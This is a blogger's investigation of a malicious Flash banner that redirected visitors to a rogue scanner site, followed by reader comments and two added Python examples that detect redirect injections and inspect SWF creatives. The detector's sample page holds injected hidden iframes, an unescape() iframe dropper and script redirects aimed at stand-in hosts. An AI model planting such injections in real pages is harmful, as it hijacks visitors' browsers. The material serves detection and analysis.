Mystery Diary Digest: Dot.Tunes, Orange Flash Ad and Mysterious ID Q76123

Mac MacHouse






Introduction

There is some confusion about the orange Flash ad. So we have decided to take the time to explain to our visitors, from the beginning, how it started and what is going on, and let them draw their own conclusions.






Beginning

In mid-December 2007, we started seeing something different on our websites. First came white-yellow Flash ads (with a young man in them) related to MP3 music. Then an orange horizontal Flash ad (728 x 90 pixels) started appearing. When this orange Flash ad started appearing, we also started experiencing something unpleasant on our websites: involuntary redirection to Malware Alarm's website (malware-scan.com). The orange Flash ad was always running on our website both before and after the involuntary redirection. It's not that we have anything against the individual or company who ran this particular Flash ad. But inevitably we came to believe that this orange Flash ad was being used as the medium to redirect us and our visitors to the malware scan website.

Some of our visitors may not have seen either the white-yellow or the orange Flash ad. That's because many ad companies target their ads, so that a given ad appears only depending on factors such as the visitor's geographical location. Reproducing a malicious ad is therefore location-dependent: the same ad code can serve a clean creative to one visitor and the orange one to another.






Finding the ad company

At first, we at MacHouse had to find out which ad company was responsible for the orange Flash ad. That was not so easy, and let me explain why. Our primary suspect was AdBrite. Let me say up front that they aren't actually involved in this mystery. Screenshot 01 shows their ad system: a publisher can control which ads to approve and which to reject. Since AdBrite was our primary suspect, we simply had to find the orange Flash ad under Approved Ads. I personally spent about 40 minutes looking for it, but it isn't there. So AdBrite turned out to be in the clear, and we are sorry to have brought up AdBrite's name.

At that point we had no other obvious suspect. It was possible that another ad company, Canep Media, had brought this orange Flash ad to our system. But Canep Media has always been good to us: they are polite and respond to our questions promptly. Canep Media is one of some three dozen ad companies trading rich media campaigns at AdECN, and AdBrite is also a seat holder at AdECN, I suppose.

Anyway, let me explain why it could be Canep Media. Screenshot 02 shows AdBrite's system again. Under the Pricing Options tab, we can decide what to display when no ad company is willing to display an ad on our websites: we are allowed to inject an ad code from another advertising system. This ad campaign is configured so that an ad brought by Canep Media is displayed on our websites whenever AdBrite has no advertisers for us. By the way, the ad code says adecn.com. Canep Media acts as a broker, so the actual ad comes from AdECN. The ad industry calls this kind of fallback a passback or default tag; for this article, let's call the ad from AdECN/Canep Media an escape ad. And we can in turn designate an escape ad for when Canep Media cannot find any advertisers for us. That's why finding the ad company responsible for the orange Flash ad is not so easy: the creative that finally renders can be several hand-offs removed from the ad code on the page.


Screenshot 01: AdBrite's ad system, with the publisher's Approved Ads list
Screenshot 02: AdBrite's Pricing Options tab, where the AdECN/Canep Media ad code is injected as the fallback



Okay. So far, we have assumed that Dot.Tunes' orange Flash ad is being used as the medium for the involuntary redirection to Malware Alarm. The next step was to remove all ads and put up just one ad, with the ad code from AdECN/Canep Media. We showed a documentation video under the article of January 1.



[Documentation video (January 1 article): the page with blank ad slots, then with only the AdECN/Canep Media ad code]



This video shows that I had no ads (blank files) at first, and that once the ad code from AdECN/Canep Media was injected, Dot.Tunes' orange ad appeared and I was redirected to Malware Alarm's spam website. No matter how many times we visited our own websites, we only saw this orange ad.






Other possibilities

How sure are we that Dot.Tunes' orange Flash ad is responsible for the redirection? Well, it's not exactly their Flash ad as such that is in question. First, let me mention that there are a couple of possible exploitation types here: one is SQL injection and the other is iframe injection. Our suspicion falls on the latter. SQL injection is not the case here, because the involuntary redirection occurs even at http://www.mhvt.net/index.php, where no database is used; a SQL injection attack plants the malicious code in the database, so a page whose content never comes from a database cannot be carrying it. How about the latter? We don't use iframes ourselves, and we checked several web pages where the redirection had occurred and didn't find any iframe code. I'm not terribly sure, but one can be redirected by something as simple as an injected iframe whose source is

http://xxx.xxx.xxx.xxx/iframe/file.php, where xxx.xxx.xxx.xxx is just the IP address of the destination.
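The check described above, reading served pages for an injected iframe, can be automated. The following is an added example and not MacHouse's own code: it scans constructed sample HTML for the redirect vectors an eyeball check tends to miss (zero-size or hidden iframes, meta refresh, script-driven location changes, and document.write(unescape()) droppers that only turn into an iframe once the page runs). Every hostname in the sample is a placeholder; the xxx.xxx.xxx.xxx address is the post's own stand-in for an attacker IP.

```python
"""Scan saved page source for injected redirect vectors (added example, not MacHouse code)."""
import re
from html.parser import HTMLParser
from urllib.parse import unquote

LOCATION_RE = re.compile(
    r"(?:window|document|top|self|parent)\.location(?:\.href)?\s*=|location\.replace\s*\(", re.I)
UNESCAPE_RE = re.compile(r"unescape\s*\(\s*(['\"])(.*?)\1\s*\)", re.I | re.S)
HIDDEN_STYLE_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}", re.I)


class RedirectFinder(HTMLParser):
    """Collects (kind, detail) findings while the parser streams through the document."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._script = None            # list of text chunks while inside <script>, else None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            dims = [a.get("width"), a.get("height")]
            tiny = all(d is not None and d.strip().rstrip("px").strip() in ("0", "1") for d in dims)
            hidden = tiny or bool(HIDDEN_STYLE_RE.search(a.get("style") or ""))
            self.findings.append(("hidden_iframe" if hidden else "iframe", a.get("src", "")))
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            self.findings.append(("meta_refresh", a.get("content", "")))
        elif tag == "script":
            self._script = []

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            js, self._script = "".join(self._script), None
            if LOCATION_RE.search(js):
                self.findings.append(("script_location", js.strip()[:80]))
            for _quote, encoded in UNESCAPE_RE.findall(js):
                decoded = unquote(encoded)
                if "<iframe" in decoded.lower():
                    # Decode the dropper and scan the markup it would have written at run time.
                    inner = RedirectFinder()
                    inner.feed(decoded)
                    self.findings += [("unescape_" + kind, detail) for kind, detail in inner.findings]


def scan_html(html):
    """Return every redirect vector found in one page, in document order."""
    finder = RedirectFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample of a compromised index.php response; every host here is fictitious.
SAMPLE_PAGE = """<html><head><title>index.php</title>
<meta http-equiv="refresh" content="0;url=http://scan.example.invalid/">
</head><body>
<p>Welcome.</p>
<iframe src="http://xxx.xxx.xxx.xxx/iframe/file.php" width="0" height="0"></iframe>
<iframe src="http://ads.example.invalid/728x90.html" width="728" height="90"></iframe>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fdrop.example.invalid%2Fx.php%22%20style%3D%22display%3Anone%22%3E%3C%2Fiframe%3E'));</script>
<script>if (document.referrer) { window.location = 'http://scan.example.invalid/?r=1'; }</script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_PAGE):
        print(f"{kind:24} {detail}")
```

This only sees what the publisher's own server sent. A redirect fired from inside a third-party SWF (ActionScript getURL or navigateToURL) or by the ad server's own script never appears in the page source, so a clean result here does not clear the ad slot; it only narrows the problem to whatever the ad code delivers.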

It's also possible that the iframe injection happens before the orange Flash ad reaches our system, or that some other exploitation type is used before the ad is actually delivered to us. Let's take a look at the diagram below.


[Diagram: the ad delivery chain from the first ad company (AD1) through intermediaries (AD3) to MacHouse's websites]



At the end of December, we contacted Canep Media so that they could investigate our claim that the orange Flash ad from DotTunes was responsible for the redirection. We contacted Canep Media because we didn't, and still don't, know how the Flash ad was relayed before it finally reached us. We don't know who the first ad company is; it's shown as AD1 in the diagram. We don't know how many companies are involved in the trade; there could be more than AD1 and AD3. It's been 10 days since we first contacted Canep Media, but they haven't told us anything. I don't even know whether they are investigating our claim. So we don't know where the malicious code is injected, since we don't even know who AD1 is.

However, whether DotTunes is happy about it or not, our hypothesis that DotTunes' orange Flash ad is used as the medium for the involuntary redirection to Malware Alarm stands. The screenshots in the article of January 5 show that I was redirected on a totally different website, and the orange Flash ad was there too (pay attention to the status bar). The second documentation video, in the article of January 6, shows the same thing: their orange ad is there.






[Documentation video (January 6 article): redirection on a different website, with the orange Flash ad present]
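Both videos show the same orange creative present whenever the redirect fires. What a video cannot show is what is inside that creative, and that is the next thing a practitioner would look at: save the SWF the ad code delivers and inspect it. The following is an added example, not code from MacHouse, Dot.Tunes, TriAgency or any ad network. build_swf() constructs a sample 728x90 creative in memory whose first frame calls ActionGetURL; inspect_swf() then does what an analyst does with a saved creative: decompresses it, walks the tag list, decodes the DoAction records and reports every URL the movie could send the browser to. The landing URL is a placeholder, not one observed on this page.

```python
"""Inspect a Flash (SWF) creative for redirect behaviour (added example, not MacHouse code)."""
import re
import struct
import zlib

# Tag and action codes from the SWF file format specification.
TAG_END, TAG_SHOW_FRAME, TAG_DO_ACTION, TAG_DO_INIT_ACTION, TAG_DO_ABC = 0, 1, 12, 59, 82
ACTION_END, ACTION_GET_URL, ACTION_CONSTANT_POOL, ACTION_GET_URL2 = 0x00, 0x83, 0x88, 0x9A
TAG_NAMES = {0: "End", 1: "ShowFrame", 12: "DoAction", 59: "DoInitAction", 82: "DoABC"}
URL_RE = re.compile(rb"https?://[\x21-\x7e]+")


def encode_rect(xmin, xmax, ymin, ymax, nbits=15):
    """Bit-pack a SWF RECT: 5-bit field width, four signed fields, padded to a byte."""
    bits = format(nbits, "05b") + "".join(
        format(v & ((1 << nbits) - 1), f"0{nbits}b") for v in (xmin, xmax, ymin, ymax))
    bits += "0" * (-len(bits) % 8)
    return int(bits, 2).to_bytes(len(bits) // 8, "big")


def tag(code, body):
    """RECORDHEADER: UI16 = (code << 6) | length; lengths >= 0x3F use a trailing UI32."""
    if len(body) < 0x3F:
        return struct.pack("<H", (code << 6) | len(body)) + body
    return struct.pack("<HI", (code << 6) | 0x3F, len(body)) + body


def build_swf(url=None, target="_top", compress=True):
    """Constructed sample creative; with a url, frame 1 fires ActionGetURL(url, target)."""
    actions = b""
    if url is not None:
        payload = url.encode() + b"\x00" + target.encode() + b"\x00"
        actions = tag(TAG_DO_ACTION, bytes([ACTION_GET_URL]) + struct.pack("<H", len(payload))
                      + payload + bytes([ACTION_END]))
    body = (encode_rect(0, 728 * 20, 0, 90 * 20)      # 728x90 px; SWF measures in twips
            + struct.pack("<HH", 24 << 8, 1)           # 24.0 fps (8.8 fixed point), 1 frame
            + actions + tag(TAG_SHOW_FRAME, b"") + tag(TAG_END, b""))
    header = bytes([8]) + struct.pack("<I", 8 + len(body))   # version 8, uncompressed length
    return b"CWS" + header + zlib.compress(body) if compress else b"FWS" + header + body


def parse_actions(body):
    """Walk AS1/AS2 action records; return GetURL (url, target) pairs and pool strings."""
    urls, pool, i = [], [], 0
    while i < len(body) and body[i] != ACTION_END:
        code, data = body[i], b""
        i += 1
        if code >= 0x80:                               # long action: UI16 payload length
            (n,) = struct.unpack_from("<H", body, i)
            data, i = body[i + 2:i + 2 + n], i + 2 + n
        if code == ACTION_GET_URL:
            url, tgt = data.split(b"\x00")[:2]
            urls.append((url.decode("latin-1"), tgt.decode("latin-1")))
        elif code == ACTION_GET_URL2:                  # URL is taken from the stack at run time
            urls.append(("<stack>", "<stack>"))
        elif code == ACTION_CONSTANT_POOL:             # UI16 count, then NUL-terminated strings
            pool += [s.decode("latin-1") for s in data[2:].split(b"\x00")[:-1]]
    return urls, pool


def inspect_swf(blob):
    """Report header facts, the tag list and every navigation target found in a SWF."""
    sig, version = blob[:3], blob[3]
    (declared,) = struct.unpack_from("<I", blob, 4)
    if sig == b"CWS":
        data = zlib.decompress(blob[8:])
    elif sig == b"FWS":
        data = blob[8:]
    else:                                              # ZWS (LZMA) is left out of this example
        raise ValueError(f"unsupported SWF signature {sig!r}")
    pos = (5 + 4 * (data[0] >> 3) + 7) // 8            # skip the RECT
    rate, frames = struct.unpack_from("<HH", data, pos)
    pos += 4
    report = {"signature": sig.decode(), "version": version, "length_ok": declared == 8 + len(data),
              "frame_rate": rate / 256.0, "frame_count": frames, "tags": [],
              "get_url": [], "constant_pool": [], "has_abc": False}
    while pos + 2 <= len(data):
        (hdr,) = struct.unpack_from("<H", data, pos)
        code, length, pos = hdr >> 6, hdr & 0x3F, pos + 2
        if length == 0x3F:
            (length,) = struct.unpack_from("<I", data, pos)
            pos += 4
        body, pos = data[pos:pos + length], pos + length
        report["tags"].append(TAG_NAMES.get(code, f"Tag{code}"))
        if code in (TAG_DO_ACTION, TAG_DO_INIT_ACTION):  # DoInitAction has a UI16 sprite id first
            urls, pool = parse_actions(body if code == TAG_DO_ACTION else body[2:])
            report["get_url"] += urls
            report["constant_pool"] += pool
        elif code == TAG_DO_ABC:                       # AS3: navigateToURL shows up as strings
            report["has_abc"] = True
        if code == TAG_END:
            break
    # Strings catch AS3 code, wrapper movies and anything the action walk does not decode.
    report["url_strings"] = sorted({m.decode("latin-1") for m in URL_RE.findall(data)})
    return report


if __name__ == "__main__":
    sample = build_swf("http://landing.example.invalid/scan.php")
    for key, value in inspect_swf(sample).items():
        print(f"{key:14} {value}")
```

With a real creative you would pass the bytes read from disk to inspect_swf(). Two points worth knowing: a CWS file is zlib-compressed after its 8-byte header, so a plain strings search on the file finds nothing until it is decompressed; and a creative that wraps another movie or loads one at run time usually still exposes the loader URL as a string, which is why the string scan runs in addition to the action walk. An AS3 creative (has_abc set) or an LZMA-compressed one needs further decoding than this example does.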






Whose Flash ad is it?

We honestly believed that the orange Flash ad in question belonged to Dot.Tunes. But we aren't sure that's the case any more. Although we have no direct business with Dot.Tunes, I personally sent an e-mail message to them. It took them several days to get back to me. You can see screenshots of the exact messages below, but let me summarize our communication.





  • MacHouse – Tom Bluewater: An orange Flash ad is responsible for an involuntary redirection to a malware website, you know that, right?
  • Dot.Tunes – Jeff Ayling: What Flash ad? We aren’t running any.
  • MacHouse – Tom Bluewater: It’s this one. You mean, it’s not yours?
  • Dot.Tunes – Jeff Ayling: No. I have never seen it.




Screenshot 03: e-mail exchange with Dot.Tunes (1)
Screenshot 04: e-mail exchange with Dot.Tunes (2)
Screenshot 05: e-mail exchange with Dot.Tunes (3), the question about an affiliate program





So whose is it? Again, we have no idea. One gentleman calling himself Phil Graci posted a comment demanding that we rewrite an article; he also said that he created this Flash ad (see Screenshot 06). Jeff Ayling, Stephen Chukumba, Phil Graci… I have no idea which gentleman is telling us the truth.

In fact, we were forced to go back to youhide.com and make sure where one is sent upon clicking on the orange Flash ad in question. It's http://www.dottunes.net/. But it's not their ad?

Screenshot 06: Phil Graci's comment






[Documentation video: clicking the orange Flash ad at youhide.com lands on dottunes.net with a reference ID in the URL]






Mysterious ID


As you can see in the documentation video presented above, one is redirected to DotTunes' website with some kind of reference number in the URL (see Screenshot 07). ref… does it stand for referral? So I asked Mr. Ayling whether they have an affiliate program (see Screenshot 05). Unfortunately, I haven't heard from him. It seems that he has intentionally stopped communicating with me.

Furthermore, we spent an hour yesterday trying to find out whether Dot.Tunes has a referral program of any kind. We asked Google, and we couldn't find any evidence that they have one.

Screenshot 07: the click-through URL to dottunes.net carrying the reference ID



In fact, it doesn't matter on which website you click the orange Flash ad. If you find the same Flash ad somewhere else and click on it, you are redirected to DotTunes' website with this same ID. We know it because we tested on our own website with the ad code from AdECN/Canep Media and confirmed that the ID is the same: Q76123. A per-publisher referral code would change from site to site; this one does not, which suggests it is tied to the creative rather than to the site it runs on.






Conclusions

As we noted in our January 1 article, our immediate interest is in showing that there is injury. That is, we wanted to show that Dot.Tunes' Flash ad has been used to redirect visitors arriving at MHVT.NET/MHOUSE-J.COM to Malware Alarm's malware website. Because our documentation videos consistently support the hypothesis that the redirection mechanism is triggered only in the presence of the Dot.Tunes Flash ad, we have concluded that the Dot.Tunes Flash ad is used as the medium for the redirection. A temporary remedy for this involuntary redirection exists, as far as we know: since we removed the ad code from AdECN/Canep Media, eliminating any possibility of displaying the Dot.Tunes Flash ad, no visitor to MacHouse's websites has been redirected to Malware Alarm's malware scan website against their will.

We are not particularly interested in how the injury occurs. That is, finding out how the redirection mechanism works or where a malicious redirection code is injected was not our immediate concern. MacHouse has never stated that Dot.Tunes or AdECN/Canep Media is responsible for injecting a malicious redirection code, if such a code exists. MacHouse is not an authority of any kind, so it is not our responsibility to find out exactly how the redirection mechanism works and who is ultimately responsible.

Furthermore, MacHouse has informed all concerned parties, including Dot.Tunes, Canep Media and youhide.com (Certified Nerds LLC), in a timely manner. Our responsibility therefore ended at this point.






End notes


It is certain that it is partially our fault that some of our visitors may have been redirected to Malware Alarm's spam website. We owe them a big apology because we could have removed the ill Flash ad sooner. I wish we had realized sooner that the ad code came from AdECN/Canep Media. I'm not implying in any way that AdECN or Canep Media is responsible for the iframe injection or whatever it is; MacHouse has no supporting evidence for such a claim, even if it were the case. Nor have we ever implied that DotTunes or their web developer injected malicious code into their Flash ad.

Screenshot 08



In the meantime, I don't know how far they have cooperated so far (see Screenshot 08), but if they want to help find out how this involuntary redirection works, answering the following three questions would help. Of course, they don't have to.





1. Who is your ad company (AD1)?
2. Do you have a referral program?
3. What does Q76123 stand for?




Finally, let me stress that a lot of innocent people are involved. According to Quantcast, Malware Alarm (malware-scan.com) gets 2.8 million unique visitors per month! Some of them buy its malware and then end up buying another malware-removal application to remove Malware Alarm's junk program. For us, our journey is over. We have removed the ad code from AdECN/Canep Media, so our visitors won't be redirected to Malware Alarm's spam website for the time being. In the meantime, we are looking forward to a big event around January 16. Hopefully, we will see a big change.


We would like to add one fact to end this diary digest. We confirmed about 38 hours ago that the orange Flash ad from Dot.Tunes was pulled. We noticed the change when we put the ad code from AdECN/Canep Media back on to test a different theory yesterday: the orange ad has been replaced by another (see Screenshot 09). We do not know whether Dot.Tunes pulled their ad themselves, whether it was the ad company's decision to switch, or whether there is some kind of investigation and the orange Flash ad has been suspended. We also confirmed the change at youhide.com yesterday.

Screenshot 09: the replacement ad served by the AdECN/Canep Media ad code






References:

Malware-Scan.Com, DotTunes.Net's Flash Ad and Computer Virus
More Evidence for Dot.Tunes Flash Banner As Source of Ill Redirection to Malware-Scan.Com
Destroying Malwarealarm.com
Flash-Based Ad and Involuntary Redirection to Malware-Scan.com

This entry was posted in Internet security.

5 Responses to Mystery Diary Digest: Dot.Tunes, Orange Flash Ad and Mysterious ID Q76123

1. Phil Graci says:

To clarify, I am the lead web developer for DOT.TUNES; I run one of the partner companies, TriAgency.

In my initial response I stated that I created this flash ad, which we did. However, not the malware one! What we created was the design for this ad, which was run on a few sites back in Oct/Nov when we did some cross promotion. But the file was not run via an ad network; it was just in the page itself that we created for the promotion.

What seems to have happened is someone running this scam took our SWF, and maybe opened it via some Flash edit program that lets you open SWFs, or just wrapped it inside another SWF. Either way, they stole our identity to run their scam!

Thanks again for finding the problem, and I do see that you are questioning whether we were involved, and I can promise to everyone in the world that we did not take part in this scam. We had no idea about it until you wrote your article.

I do appreciate the tone of this post in that it does clarify for your readers the bigger problem. Much appreciated on that.

Please advise if you have any suggestions!

Phil
TriAgency / DOT.TUNES

2. Phil Graci says:

We also have no affiliate program. The site is all written in HTML; there is no script or backend code running to even capture any affiliate data! See for yourself: all of our files are HTML files and not PHP or anything.

3. admin says:

To Mr. Graci,

Sensing Mr. Chukumba's tone and yours, we fear that Dot.Tunes will file a lawsuit against us in the near future for the retraction of our articles and restitution for their damaged reputation, so we cannot assist you any further in any way. I have stated before that MacHouse is obligated to amend any incorrect statements, if there are any, given your supporting evidence stating otherwise. Without it, we have no statement to amend.

4. Phil Graci says:

Greetings Admin –

For the record, to Machouse, MVHT.net, and all your readers, we have absolutely no intention of suing anyone from your companies. We are a small group of independent companies, who prefer to make our money from innovation :)

I also apologize immensely for my and Mr Chukumba's initial tone. We misunderstood the spirit of your article, and were too quick to respond. We should have checked with Jeff at DOT.TUNES to see that he had been in contact with you. On his behalf, I do not think he realized what was going on exactly. He is also located in Australia, and the time delay would account for his timeliness in responding, and our not connecting on the issue before you blogged about it! We applaud your efforts to document what was going on, and to try to resolve the issue.

That being said, you can imagine the worry on our part when we read this article (and the other) which seemed to imply that DOT.TUNES was behind the scam or taking part in it. As I have stated many times before, we were in no way involved! Our initial reaction for you to revise your statement is unnecessary, because I believe that the record will be straight when people read these blog comments. One request we do have, if ANYTHING could be amended, it would be that the title of the articles in question (as well as your YouTube video), with the phrase "Dottunes.net's Flash ad", does seem to imply that it is OUR ad, when in fact it IS NOT!!

I stated earlier that we (TriAgency) created that ad for a DOT.TUNES promotional campaign. After investigating, I retract that statement – IN FACT WE DID NOT CREATE THAT AD, AND I HAVE PROOF!

Initially I watched the video documentation and thought the ad looked familiar, and claimed it WAS one of ours. I have to find the ad that I was thinking of, but we did a huge round of ads for various Music, iPhone and iPod Touch blog/websites in the fall of 07. Actually, now that I have looked, the ads we made look NOTHING like the one in question. For your perusal, here are all of our banner ads for 2007:

http://blog.dottunes.net/dt_ad_banners/420_240_ad_c.jpg
http://blog.dottunes.net/dt_ad_banners/bannerAd2.jpg
http://blog.dottunes.net/dt_ad_banners/bannerAdd.jpg
http://blog.dottunes.net/dt_ad_banners/dt_iphone_ad.jpg
http://blog.dottunes.net/dt_ad_banners/dt_itunes01_ad.jpg
http://blog.dottunes.net/dt_ad_banners/dt_palm_ad.jpg
http://blog.dottunes.net/dt_ad_banners/dt_share_ad.jpg
http://blog.dottunes.net/dt_ad_banners/dt_psp_ad.jpg
http://blog.dottunes.net/dt_ad_banners/iLounge_bannerAd3.jpg
http://blog.dottunes.net/dt_ad_banners/WebInterface_Ad_iphone.jpg
http://blog.dottunes.net/dt_ad_banners/WebInterface_Ad_palm.jpg
http://blog.dottunes.net/dt_ad_banners/WebInterface_Ad_psp.jpg
http://blog.dottunes.net/dt_ad_banners/WebInterface_Ad_touch.jpg
http://blog.dottunes.net/dt_ad_banners/WebInterface_Ad_wii.jpg

Something else seemed odd once I re-watched your video again this morning.

DOT.TUNES has ****NEVER***** used the taglines

"MUSIC SHALL SET YOUR FREE" or "Set your tunes free, and the rest will follow"

Our word marks are

"FREE YOUR TUNES" and "Free your tunes, and the rest will follow"

Other variations always play on "FREE YOUR **device**", or "FREE THE **musician/dj**", but we have never ever ever used "Music shall set you free"..

The font that is used for the word DOT.TUNES is also too wide, which is another clue it is not us.

SO THIS AD IS A TOTAL FAKE. I fully retract my previous statement that we had created the SWF that is running on ADEcn at all! Initially I thought that one of our ads had been stolen, but in fact, a totally fake ad was made and has malware in it.

Either someone is trying to make us look bad, or the malware scammer is faking people's identities to run their game.

Here are a few of our real ads/promos that were run, and you can see that the ad in question is not even up to par graphically with our real ads.

We are contacting adECN to try to get to the bottom of who ran this ad. We will stay in touch with you and let you know the outcome. Once again thank you for bringing this to our attention.

Philip Graci
TriAgency – http://www.triagency.com
DOT.TUNES – http://www.dottunes.net

5. del_lover says:

I see people getting richer and richer with more advanced bad electronic tools these days. Looks like the attacker decided to mislead everybody and set an alert (which was triggered by this article) for a withdrawal in case of risks for him.
I am thinking of possible law restrictions, digital signatures, isolated Internet spaces, but all these will not combat the hackers. Hackers can always find something new. For example, I bet that soon web sites will exploit CPU/memory resources for their own benefit without the user's permission. Imagine a digital signature cracker system that uses Flash animations running on 1,000,000 computers. Electronic voting systems, be aware!
For me the best way to avoid crimes is a good education for all the people in the World. Second, all people need to live well.

Here is an interesting story for you:
To avoid bomb detonation via mobile phone, operators request your personal identity for a SIM card purchase. I remember that bombers paid poor old-aged people to buy mobile phones (SIMs). Bombs exploded soon. The police found who bought the SIM cards. The police found the old-aged people, who were not criminals at all. Unfortunately the bombers knew that they would get away if they used the old-aged people.

The human – not an instrument, but an aim – that is my motto.
